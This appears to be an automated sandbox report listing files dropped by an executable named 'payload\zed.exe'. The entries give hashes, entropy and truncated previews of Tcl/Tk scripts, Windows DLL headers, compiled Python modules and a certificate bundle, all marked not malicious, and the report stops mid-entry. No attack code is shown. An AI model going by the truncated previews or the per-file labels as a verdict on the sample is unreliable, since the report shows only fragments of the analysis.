                                                                                                                                                                                                                                            Preview:#..# ttk::spinbox bindings..#....namespace eval ttk::spinbox { }....### Spinbox bindings...#..# Duplicate the Entry bindings, override if needed:..#....ttk::copyBindings TEntry TSpinbox....bind TSpinbox <Motion>...{ ttk::spinbox::Motion %W %x %y }..bind TSpinbox <Button-1> ..{ ttk::spinbox::Press %W %x %y }..bind TSpinbox <ButtonRelease-1> .{ ttk::spinbox::Release %W }..bind TSpinbox <Double-Button-1> .{ ttk::spinbox::DoubleClick %W %x %y }..bind TSpinbox <Triple-Button-1> .{} ;# disable TEntry triple-click....bind TSpinbox <Up>...{ event generate %W <<Increment>> }..bind TSpinbox <Down> ...{ event generate %W <<Decrement>> }....bind TSpinbox <<Increment>>..{ ttk::spinbox::Spin %W +1 }..bind TSpinbox <<Decrement>> ..{ ttk::spinbox::Spin %W -1 }....ttk::bindMouseWheel TSpinbox ..[list ttk::spinbox::MouseWheel %W]....## Motion --..#.Sets cursor...#..proc ttk::spinbox::Motion {w x y} {.. variable State.. ttk::saveCursor $w State(userConfCursor) [ttk::cursor text].. if { [$w ide
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10180
                                                                                                                                                                                                                                            Entropy (8bit):4.886259798213254
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:FoTvMxHZZ1u2xj7+ZBHxjiXJv9IfwW+vr3UxjXEJDTF/MyLF3JcMzlsra2tYGa5P:mImAkRKYXMH59o4UbS30LWb
                                                                                                                                                                                                                                            MD5:F705B3A292D02061DA0ABB4A8DD24077
                                                                                                                                                                                                                                            SHA1:FD75C2250F6F66435444F7DEEF383C6397ED2368
                                                                                                                                                                                                                                            SHA-256:C88B60FFB0F72E095F6FC9786930ADD7F9ED049EABC713F889F9A7DA516E188C
                                                                                                                                                                                                                                            SHA-512:09817638DD3D3D5C57FA630C7EDF2F19C3956C9BD264DBF07627FA14A03AECD22D5A5319806E49EF1030204FADEF17C57CE8EAE4378A319AD2093321D9151C8F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# ttk::treeview widget bindings and utilities...#....namespace eval ttk::treeview {.. variable State.... # Enter/Leave/Motion.. #.. set State(activeWidget) .{}.. set State(activeHeading) .{}.... # Press/drag/release:.. #.. set State(pressMode) .none.. set State(pressX)..0.... # For pressMode == "resize".. set State(resizeColumn).#0.... # For pressmode == "heading".. set State(heading) .{}..}....### Widget bindings...#....bind Treeview.<Motion> ..{ ttk::treeview::Motion %W %x %y }..bind Treeview.<B1-Leave>..{ #nothing }..bind Treeview.<Leave>...{ ttk::treeview::ActivateHeading {} {}}..bind Treeview.<Button-1> ..{ ttk::treeview::Press %W %x %y }..bind Treeview.<Double-Button-1> .{ ttk::treeview::DoubleClick %W %x %y }..bind Treeview.<ButtonRelease-1> .{ ttk::treeview::Release %W %x %y }..bind Treeview.<B1-Motion> ..{ ttk::treeview::Drag %W %x %y }..bind Treeview .<Up> ..{ ttk::treeview::Keynav %W up }..bind Treeview .<Down> ..{ ttk::treeview
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4993
                                                                                                                                                                                                                                            Entropy (8bit):4.954034141173847
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:lfxukTy5jPTq8LIgF2diyNTNR6nkrn4ijSSvNigyJ5612HtZG835MSvWOTRsHWU:BM+y5jrq8G/2nkEijSSvNigyJ5612Htw
                                                                                                                                                                                                                                            MD5:AF45B2C8B43596D1BDECA5233126BD14
                                                                                                                                                                                                                                            SHA1:A99E75D299C4579E10FCDD59389B98C662281A26
                                                                                                                                                                                                                                            SHA-256:2C48343B1A47F472D1A6B9EE8D670CE7FB428DB0DB7244DC323FF4C7A8B4F64B
                                                                                                                                                                                                                                            SHA-512:C8A8D01C61774321778AB149F6CA8DDA68DB69133CB5BA7C91938E4FD564160ECDCEC473222AFFB241304A9ACC73A36B134B3A602FD3587C711F2ADBB64AFA80
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Ttk widget set initialization script...#....### Source library scripts...#....namespace eval ::ttk {.. variable library.. if {![info exists library]} {...set library [file dirname [info script]].. }..}....source -encoding utf-8 [file join $::ttk::library fonts.tcl]..source -encoding utf-8 [file join $::ttk::library cursors.tcl]..source -encoding utf-8 [file join $::ttk::library utils.tcl]....## ttk::deprecated $old $new --..#.Define $old command as a deprecated alias for $new command..#.$old and $new must be fully namespace-qualified...#..proc ttk::deprecated {old new} {.. interp alias {} $old {} ttk::do'deprecate $old $new..}..## do'deprecate --..#.Implementation procedure for deprecated commands --..#.issue a warning (once), then re-alias old to new...#..proc ttk::do'deprecate {old new args} {.. deprecated'warning $old $new.. interp alias {} $old {} $new.. uplevel 1 [linsert $args 0 $new]..}....## deprecated'warning --..#.Gripe about use of deprecated comman
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8624
                                                                                                                                                                                                                                            Entropy (8bit):5.001791071900077
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:e0ebpSp+IZwnmTmpx8xzaHfw8K7LlJWQl8p7M+R5:rw0+WmpWxa/w9nlJHu
                                                                                                                                                                                                                                            MD5:51086BC3315A4AE4A8591A654CFC3CEA
                                                                                                                                                                                                                                            SHA1:2AC08309C63575B7A01FA62D3C262643CD8C823A
                                                                                                                                                                                                                                            SHA-256:4AA041C050758B3331DC395381F7FBCE81E387908FC7A3C6107C4E7140F56F2E
                                                                                                                                                                                                                                            SHA-512:6D69F7EAC9D5AF3B3EA85AE3E74BDFA6278789502D5E35EFE94349BFC543503BE7540D783D2632E349DD53F21074C702AC1FC487EE70C74234A08397F7238723
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Utilities for widget implementations...#....### Focus management...#..# See also: #1516479..#....## ttk::takefocus --..#.This is the default value of the "-takefocus" option..#.for ttk::* widgets that participate in keyboard navigation...#..# NOTES:..#.tk::FocusOK (called by tk_focusNext) tests [winfo viewable]..#.if -takefocus is 1, empty, or missing; but not if it's a..#.script prefix, so we have to check that here as well...#..#..proc ttk::takefocus {w} {.. expr {[$w instate !disabled] && [winfo viewable $w]}..}....## ttk::GuessTakeFocus --..#.This routine is called as a fallback for widgets..#.with a missing or empty -takefocus option...#..#.It implements the same heuristics as tk::FocusOK...#..proc ttk::GuessTakeFocus {w} {.. # Don't traverse to widgets with '-state disabled':.. #.. if {![catch {$w cget -state} state] && $state eq "disabled"} {...return 0.. }.... # Allow traversal to widgets with explicit key or focus bindings:.. #.. if {[regexp {Key|F
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9710
                                                                                                                                                                                                                                            Entropy (8bit):4.6639701588183895
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:BktY1F+qXd95WSZaHFHRE3GRKFh2oaoT/ezKpqvYMHab:V1F+cd95WSZuhRE34KbPmKmY2ab
                                                                                                                                                                                                                                            MD5:0AA7F8B43C3E07F3A4DA07FC6DF9A1B0
                                                                                                                                                                                                                                            SHA1:153AFB735B10BBA16CFBE161777232F983845D90
                                                                                                                                                                                                                                            SHA-256:EC5F203C69DF390E9B99944CF3526D6E77DC6F68E9B1A029F326A41AFED1EF81
                                                                                                                                                                                                                                            SHA-512:5406553211CD6714C98EF7765ABD46424CCB013343EFF693FDD3AE6E0AAE9B5983446E0E1CC706D6B2C285084BF83D397306D3D52028CBBCFB8F369857C5B69C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Settings for Microsoft Windows Vista and Server 2008..#....# The Vista theme can only be defined on Windows Vista and above. The theme..# is created in C due to the need to assign a theme-enabled function for..# detecting when themeing is disabled. On systems that cannot support the..# Vista theme, there will be no such theme created and we must not..# evaluate this script.....if {"vista" ni [ttk::style theme names]} {.. return..}....namespace eval ttk::theme::vista {.... ttk::style theme settings vista {.... .ttk::style configure . \... -background SystemButtonFace \... -foreground SystemWindowText \... -selectforeground SystemHighlightText \... -selectbackground SystemHighlight \... -insertcolor SystemWindowText \... -font TkDefaultFont \... ;.....ttk::style map "." \... -foreground [list disabled SystemGrayText] \... ;.....ttk::style configure TButton -anchor center -padding {1 1} -width -11...ttk::style configure TRadiobutton -padding 2...ttk::
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2865
                                                                                                                                                                                                                                            Entropy (8bit):4.917847108902527
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:b69VhW2gL5FPVWRzQsVqrEuF3yYrf7rfJF8xUqBgLt6g3ktO5jo4+iZ6O2htYtCW:bbXl+CEqZNNSxU0Ht2MR7W
                                                                                                                                                                                                                                            MD5:769C0719A4044F91E7D132A25291E473
                                                                                                                                                                                                                                            SHA1:6FB07B0C887D443A43FB15D5728920B578171219
                                                                                                                                                                                                                                            SHA-256:AE82BCCCE708FF9C303CBCB3D4CC3FF5577A60D5B23822EA79E3E07CCE3CBBD1
                                                                                                                                                                                                                                            SHA-512:47FED061DDC6B4EB63EF77901D0094FF2EBB1BAFACB3F44FBF13FB59DEA1EC83985B2862086ECF1A7957819A88A0FAA144B35F16BEA9356BBD9775070D42E636
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Settings for 'winnative' theme...#....namespace eval ttk::theme::winnative {.. ttk::style theme settings winnative {.....ttk::style configure "." \... -background SystemButtonFace \... -foreground SystemWindowText \... -selectforeground SystemHighlightText \... -selectbackground SystemHighlight \... -fieldbackground SystemWindow \... -insertcolor SystemWindowText \... -troughcolor SystemScrollbar \... -font TkDefaultFont \... ;.....ttk::style map "." -foreground [list disabled SystemGrayText] ;.. ttk::style map "." -embossed [list disabled 1] ;.....ttk::style configure TButton \... -anchor center -width -11 -relief raised -shiftrelief 1...ttk::style configure TCheckbutton -padding "2 4"...ttk::style configure TRadiobutton -padding "2 4"...ttk::style configure TMenubutton \... -padding "8 4" -arrowsize 3 -relief raised.....ttk::style map TButton -relief {{!disabled pressed} sunken}.....ttk::style configure TEntry \... -padding 2 -select
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2103
                                                                                                                                                                                                                                            Entropy (8bit):4.9805308941424355
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:aaiIu89VhW2gLRWJyO514rf+rfzxTrf/MW+iZ6O2htYtCp:XoXAk21nxQ7p
                                                                                                                                                                                                                                            MD5:162F30D2716438C75EA16B57E6F63088
                                                                                                                                                                                                                                            SHA1:3F626FF0496BB16B27106BED7E38D1C72D1E3E27
                                                                                                                                                                                                                                            SHA-256:AEDB21C6B2909A4BB4686837D2126E521A8CC2B38414A4540387B801EBD75466
                                                                                                                                                                                                                                            SHA-512:6EBF9648F1381D04F351BB469B6E3A38F3D002189C92EAF80A18D65632037FF37D34EC8814BBF7FAE34553645BFC13985212F24684EE8C4E205729B975C88C97
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Settings for 'xpnative' theme..#....namespace eval ttk::theme::xpnative {.... ttk::style theme settings xpnative {.....ttk::style configure . \... -background SystemButtonFace \... -foreground SystemWindowText \... -selectforeground SystemHighlightText \... -selectbackground SystemHighlight \... -insertcolor SystemWindowText \... -font TkDefaultFont \... ;.....ttk::style map "." \... -foreground [list disabled SystemGrayText] \... ;.....ttk::style configure TButton -anchor center -padding {1 1} -width -11...ttk::style configure TRadiobutton -padding 2...ttk::style configure TCheckbutton -padding 2...ttk::style configure TMenubutton -padding {8 4}.....ttk::style configure TNotebook -tabmargins {2 2 2 0}...ttk::style map TNotebook.Tab \... -expand [list selected {2 2 2 2}].....ttk::style configure TLabelframe.Label -foreground "#0046d5".....# OR: -padding {3 3 3 6}, which some apps seem to use....ttk::style configure TEntry -padding {2 2 2 4}...ttk::
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10521
                                                                                                                                                                                                                                            Entropy (8bit):5.0647027375963996
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:1Y3uWEXm/swEePmJhRAXd1hTHsHG2ML/9Lm2daM0Hu:8hodMiM0Hu
                                                                                                                                                                                                                                            MD5:508F7E258C04970FAE526990168CB773
                                                                                                                                                                                                                                            SHA1:33785204B18C0E0F5CDCB5B49399B5907351FDB8
                                                                                                                                                                                                                                            SHA-256:B463B366F139DDF7FED31F34C6D2341F9F27845A1A358011DFC801E1333B1828
                                                                                                                                                                                                                                            SHA-512:A12985B58DD1D46297119CED47B7F44EF4139CED6C36FD028E66DD657E5ED0663B744C679A5BF7A39B39D17A32E1280D2945F6B9AD59AEF20436F68040F6070C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# unsupported.tcl --..#..# Commands provided by Tk without official support. Use them at your..# own risk. They may change or go away without notice...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# ----------------------------------------------------------------------..# Unsupported compatibility interface for folks accessing Tk's private..# commands and variable against recommended usage...# ----------------------------------------------------------------------....namespace eval ::tk::unsupported {.... # Map from the old global names of Tk private commands to their.. # new namespace-encapsulated names..... variable PrivateCommands.. array set PrivateCommands {...tkButtonAutoInvoke..::tk::ButtonAutoInvoke...tkButtonDown...::tk::ButtonDown...tkButtonEnter...::tk::ButtonEnter...tkButtonInvoke...::tk::ButtonInvoke...tkButtonLeave...::tk::ButtonLeave...tkButtonUp...::tk::ButtonUp...tk
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26991
                                                                                                                                                                                                                                            Entropy (8bit):4.974180990171971
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:0BLzjXhss64XKNFXm39QJ63nwFiHLgRIdNPCRE5phLtffsNP4XWdxWk+I5oP9jNR:0BvjXoFCB3flLCRE5phLCP3xWq8vWTod
                                                                                                                                                                                                                                            MD5:FA99EF44FAA88A6BA1967A1257DEB97B
                                                                                                                                                                                                                                            SHA1:CC99DBF678F4169A90ACC5A89C6F8DAB48052EC6
                                                                                                                                                                                                                                            SHA-256:C4722EADEDE763FA52E7937D40067B0F8EB86B7A4B707F90212ED3E5289690D0
                                                                                                                                                                                                                                            SHA-512:3AF16095784908A444CD61EEF178A30B9FED9C20AA91D94044A3AECB6047267FB80BCE790FC1F28FB19AEF664A6618FD832612F541FDADCC34B6C01E92E5EA40
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# xmfbox.tcl --..#..#.Implements the "Motif" style file selection dialog for the..#.Unix platform. This implementation is used only if the..#."::tk_strictMotif" flag is set...#..# Copyright (c) 1996 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Scriptics Corporation..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::file {}......# ::tk::MotifFDialog --..#..#.Implements a file dialog similar to the standard Motif file..#.selection box...#..# Arguments:..#.type.."open" or "save"..#.args..Options parsed by the procedure...#..# Results:..#.When -multiple is set to 0, this returns the absolute pathname..#.of the selected file. (NOTE: This is not the same as a single..#.element list.)..#..#.When -multiple is set to > 0, this returns a Tcl list of absolute..# pathnames. The argument for -multiple is ignored, but for consistency..#
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):66328
                                                                                                                                                                                                                                            Entropy (8bit):6.295486583134031
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:dGpS27sIvGJdk7YeY7S81CpnHcKWlI1OSs7Sy+xe:gpVp7xKSppnHcFlI1OSsz
                                                                                                                                                                                                                                            MD5:E38A6B96F5CC200F21DA22D49E321DA3
                                                                                                                                                                                                                                            SHA1:4EA69D2B021277AB0B473CFD44E4BFD17E3BAC3B
                                                                                                                                                                                                                                            SHA-256:F0EBDF2CA7B33C26B8938EFA59678068D3840957EE79D2B3C576437F8F913F20
                                                                                                                                                                                                                                            SHA-512:3DF55CDD44EA4789FB2DE9672F421B7FF9AD798917417DCB5B1D8575804306FB7636D436965598085D2E87256ECB476ED69DF7AF05986F05B9F4A18EED9629E2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s............jQ...................................j....Ni.....................=..........Rich...........PE..d......f.........." ...(.n...j............................................................`.............................................P.............................../......0......T...............................@............................................text....l.......n.................. ..`.rdata...B.......D...r..............@..@.data... ...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):37656
                                                                                                                                                                                                                                            Entropy (8bit):6.341257574556273
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:r/mqQhTcYsjNxO0tI1Ci75YiSyvNhAMxkE9x2:Dm7GFNxO0tI1CiF7SynxRI
                                                                                                                                                                                                                                            MD5:BED7B0CED98FA065A9B8FE62E328713F
                                                                                                                                                                                                                                            SHA1:E329EBCA2DF8889B78CE666E3FB909B4690D2DAA
                                                                                                                                                                                                                                            SHA-256:5818679010BB536A3D463EEEE8CE203E880A8CD1C06BF1CB6C416AB0DC024D94
                                                                                                                                                                                                                                            SHA-512:C95F7BB6CA9AFBA50BF0727E971DFF7326CE0E23A4BFA44D62F2ED67ED5FEDE1B018519DBFA0ED3091D485ED0ACE68B52DD0BB2921C9C1E3BC1FA875CD3D2366
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.L...L...L...E..J.......H.......H.......D...Y...N.......Q.......K...L...........M...Y...M...Y...M...Y...M...Y...M...RichL...........PE..d....f.........." ...(.*...<.......(..............................................@.....`..........................................V..H...HV..................x....d.../......t...dG..T............................C..@............@.......S..@....................text...n(.......*.................. ..`.rdata..4 ...@..."..................@..@.data........p.......P..............@....pdata..x............T..............@..@.rsrc................X..............@..@.reloc..t............b..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1332769
                                                                                                                                                                                                                                            Entropy (8bit):5.586540075838612
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:VHlJGUqQlLmgBvc+fYNXPh26UZWAzyX7j7YQqPQCxf2idmSP/Hg1d2R1RbtRwvw:VHlJGUDa+zy/7UlcidmSPvaMHtRwvw
                                                                                                                                                                                                                                            MD5:242A4D3404414A9E8ED1CA1A72E8039C
                                                                                                                                                                                                                                            SHA1:B1FD68D13CC6D5B97DC3EA8E2BE1144EA2C3ED50
                                                                                                                                                                                                                                            SHA-256:CB98F93EDE1F6825699EF6E5F11A65B00CDBC9FDFB34F7209B529A6E43E0402D
                                                                                                                                                                                                                                            SHA-512:CCA8E18CC41300E204AEE9E44D68FFE9808679B7DBF3BEC9B3885257CADCCFF1DF22A3519CC8DB3B3C557653C98BAC693BF89A1E6314EF0E0663C76BE2BF8626
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:PK..........!./gJ.O...O......._collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):299427
                                                                                                                                                                                                                                            Entropy (8bit):6.047872935262006
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                                                            MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                                                            SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                                                            SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                                                            SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                                                                            Entropy (8bit):4.817893239381772
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:MRv9XFCk2z1/t12iwU5usJFcCyD9cqgE:aVVC5djuUFJKtgE
                                                                                                                                                                                                                                            MD5:71D96F1DBFCD6F767D81F8254E572751
                                                                                                                                                                                                                                            SHA1:E70B74430500ED5117547E0CD339D6E6F4613503
                                                                                                                                                                                                                                            SHA-256:611E1B4B9ED6788640F550771744D83E404432830BB8E3063F0B8EC3B98911AF
                                                                                                                                                                                                                                            SHA-512:7B10E13B3723DB0E826B7C7A52090DE999626D5FA6C8F9B4630FDEEF515A58C40660FA90589532A6D4377F003B3CB5B9851E276A0B3C83B9709E28E6A66A1D32
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d... $.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):124928
                                                                                                                                                                                                                                            Entropy (8bit):5.935676608756784
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:BETt3OiaqGB7QNX6Pq4a461TDqFRgMzrOH+d3gdy2iIeP/j3bhouROm:Bmt+is7QNqP1ab1TGb9g/iI4bhouROm
                                                                                                                                                                                                                                            MD5:D8F690EAE02332A6898E9C8B983C56DD
                                                                                                                                                                                                                                            SHA1:112C1FE25E0D948F767E02F291801C0E4AE592F0
                                                                                                                                                                                                                                            SHA-256:C6BB8CAD80B8D7847C52931F11D73BA64F78615218398B2C058F9B218FF21CA9
                                                                                                                                                                                                                                            SHA-512:E732F79F39BA9721CC59DBE8C4785FFD74DF84CA00D13D72AFA3F96B97B8C7ADF4EA9344D79EE2A1C77D58EF28D3DDCC855F3CB13EDDA928C17B1158ABCC5B4A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........yB....................7...............7.......7.......7.......6..........C....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).@...........B.......................................0............`.............................................d.................................... ......@...................................@............P...............................text....>.......@.................. ..`.rdata..PY...P...Z...D..............@..@.data....=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5440
                                                                                                                                                                                                                                            Entropy (8bit):5.074342830021076
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DlaQIUQIhQIKQILbQIRIaMPktjaVxsxA2TtLDmplH7dwnqTIvrUmA0JQTQCQx5KN:LcPuP1srTtLDmplH7JTIvYX0JQTQ9x54
                                                                                                                                                                                                                                            MD5:554DC6138FDBF98B7F1EDFE207AF3D67
